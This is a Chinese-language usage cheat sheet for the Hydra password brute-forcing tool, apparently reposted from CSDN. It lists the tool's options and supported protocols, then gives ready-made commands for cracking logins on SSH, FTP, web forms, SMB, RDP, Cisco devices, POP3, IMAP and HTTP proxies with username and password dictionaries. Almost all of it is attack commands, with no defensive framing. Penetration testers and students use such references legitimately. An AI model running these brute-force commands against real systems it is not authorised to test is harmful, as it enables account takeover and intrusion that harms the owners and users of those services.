密碼爆破_hydra


示例

hydra -l 用戶名 -P 密碼字典 ftp://192.168.0.1

hydra -L 用戶字典 -p 密碼 imap://192.168.0.1/PLAIN

hydra -C 用戶名密碼字典 -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

hydra -l 用戶名 -p密碼 ftp://[192.168.0.0/24]/

hydra -L 用戶字典 -P 密碼字典 -M 目標字典 ssh

參數說明

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

參數 說明
-R 恢復先前中止/崩潰的會話
-I 忽略現有還原文件(不要等待10秒)
-S 執行SSL連接
-s PORT 如果服務在其他默認端口上,請在此處定義它
-l LOGIN or -L FILE 使用登錄名登錄,或從文件加載多個登錄名
-p PASS or -P FILE 嘗試密碼傳遞,或從文件加載多個密碼
-x MIN:MAX:CHARSET 密碼暴力強制生成,鍵入“-x-h”以獲取幫助
-y 禁用bruteforce中的符號使用,見上文
-e nsr 嘗試“n”空密碼、“s”作為pass登錄和/或“r”反向登錄
-u 循環用戶,而不是密碼(有效!x-隱含)
-C FILE 冒號分隔“login:pass”格式,而不是-L/-P選項
-M FILE 要攻擊的服務器列表,每行一個條目,“:”指定端口
-o FILE 將找到的登錄/密碼對寫入文件而不是stdout
-b FORMAT 指定-o文件的格式:text(默認)、json、jsonv1
-f / -F 找到登錄/通過對時退出(-M:-f每個主機,-f全局)
-t TASKS 運行任務每個目標並行連接數(默認值:16)
-T TASKS 整體並行運行任務連接(對於-M,默認值為64)
-w / -W TIME 每個線程的連接之間的響應(32)/等待時間(0)
-c TIME 所有線程上每次登錄嘗試的等待時間(強制執行-t1)
-4 / -6 使用IPv4(默認)/IPv6地址(始終放在[]中,也在-M中)
-v / -V / -d 詳細模式/顯示登錄名+每次嘗試通過/調試模式
-O 使用舊的SSL v2和v3
-q 不打印有關連接錯誤的消息
-U 服務模塊使用詳細信息
-h 更多命令行選項(完整幫助)
server 目標:DNS、IP或192.168.0.0/24(此選項或-M選項)
service 要破解的服務(有關支持的協議,請參見下文)
OPT 某些服務模塊支持附加輸入(-U表示模塊幫助)

支持的服務

adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

各種用法實例

源自CSDN

1、破解ssh:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip ssh
hydra -l 用戶名 -p 密碼字典 -t 線程 -o save.log -vV ip ssh

2、破解ftp:

hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV
hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV

3、get方式提交,破解web登錄:

hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/
hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php

4、post方式提交,破解web登錄:

hydra -l 用戶名 -P 密碼字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(參數說明:-t同時線程數3,-l用戶名是admin,字典pass.txt,保存為out.txt,-f 當破解了一個密碼就停止, 10.36.16.18目標ip,http-post-form表示破解是采用http的post方式提交的表單密碼破解,<title>中 的內容是表示錯誤猜解的返回信息提示。)

5、破解https:

hydra -l \<用戶> -p \<密碼> \<IP地址> <頭部信息> "\<登錄頁面>:\<請求正文>:\<錯誤消息>"

示例:

hydra -V -l admin -P /root/pass.txt 192.168.80.128 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"

6、破解teamspeak:

hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak

7、破解cisco:

hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb

9、破解pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:

hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18

12、破解imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM